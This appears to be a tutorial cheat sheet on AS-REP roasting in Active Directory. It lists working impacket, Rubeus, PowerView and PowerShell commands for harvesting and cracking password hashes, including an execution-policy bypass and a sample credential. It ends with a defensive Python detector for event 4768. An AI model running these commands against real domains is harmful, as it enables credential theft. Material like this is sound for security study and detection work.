AS-REP Roasting

ASREPRoast

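If a user's UserAccountControl settings have "Do not require Kerberos pre-authentication" enabled, i.e., Kerberos pre-authentication is disabled for that account, anyone can request an AS-REP for the user without knowing the password. Part of that reply is encrypted with a key derived from the user's password, so it can be grabbed and brute-forced offline.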

Linux

# Without credentials (needs a list of usernames)
impacket-GetNPUsers jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
# With valid domain credentials
impacket-GetNPUsers jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

Crack using hashcat or john

Windows

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

Enumeration

# PowerView
Get-NetUser -PreauthNotRequired
Get-DomainUser -PreauthNotRequired -Verbose
# ActiveDirectory module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True}

PowerShell script to list users with the weak configuration (pre-authentication not required)

preAuthRoasting.ps1
# 4194304 (0x400000) is the DONT_REQ_PREAUTH bit of userAccountControl;
# 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule
$strFilter = "(&(objectCategory=User)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
$objSearcher.Filter = $strFilter
$objSearcher.SearchScope = "Subtree"
$colProplist = "name"
foreach ($i in $colProplist) { $objSearcher.PropertiesToLoad.Add($i) | Out-Null }
$colResults = $objSearcher.FindAll()
$colResults | Format-Table
# Use ASREPRoast
powershell.exe -ep bypass
Import-Module .\preAuthRoasting.ps1
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Domain wargrey.mon -Server 192.168.1.50 | select -expand Hash

Impacket

impacket-GetNPUsers hacktor.local/ -usersfile <userfile> -dc-ip 192.168.1.50
john --wordlist=words.txt hash.txt

impacket-GetNPUsers services.local/ -usersfile users.txt -request -format hashcat -outputfile asreproast.txt -dc-ip 10.10.175.105
# Crack using John
# Windows env
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
# Linux env
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# OR https://hashcat.net/wiki/doku.php?id=<Algo-Number>
hashcat -m <Algo-Number> hash.txt /usr/share/wordlists/rockyou.txt --show
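
Detection

On the domain controller, a ticket issued to an account that does not require pre-authentication is logged as Security event 4768 with PreAuthType 0, and roasting requests often ask for RC4 (TicketEncryptionType 0x17). The following is an added example, not part of the original page: it filters such events and groups them by source address. The JSON-lines export format, the sample events (including every account name except triceratops) and the function names are constructed for illustration.

```python
import json
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC

# Constructed sample: 4768/4769 events flattened to JSON lines (assumed export format).
SAMPLE_EVENTS = """
{"EventID": 4768, "TargetUserName": "triceratops", "IpAddress": "::ffff:10.0.0.23", "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "velociraptor", "IpAddress": "::ffff:10.0.0.66", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_backup", "IpAddress": "::ffff:10.0.0.66", "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.40", "PreAuthType": "0", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "ghost", "IpAddress": "::ffff:10.0.0.66", "PreAuthType": "0", "TicketEncryptionType": "0xffffffff", "Status": "0x6"}
{"EventID": 4769, "TargetUserName": "triceratops", "IpAddress": "::ffff:10.0.0.23", "TicketEncryptionType": "0x12", "Status": "0x0"}
"""

def find_asrep_requests(text):
    """Return successful TGT requests (event 4768) issued without pre-authentication."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue  # not a TGT request, or the KDC refused it
        if str(ev.get("PreAuthType")) != "0":
            continue  # pre-authentication was performed
        hits.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"].replace("::ffff:", ""),
            "rc4": ev.get("TicketEncryptionType", "").lower() == RC4_HMAC,
        })
    return hits

def sweeping_sources(hits, min_accounts=2):
    """Sources that obtained AS-REPs for several distinct accounts (sweep pattern)."""
    per_source = defaultdict(set)
    for h in hits:
        per_source[h["source"]].add(h["user"])
    return {s: sorted(u) for s, u in per_source.items() if len(u) >= min_accounts}

if __name__ == "__main__":
    hits = find_asrep_requests(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['user']:<14} from {h['source']:<10} rc4={h['rc4']}")
    print("sweeps:", sweeping_sources(hits))
```

Every account this returns has pre-authentication disabled, so the same output doubles as a list of accounts to review and fix.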
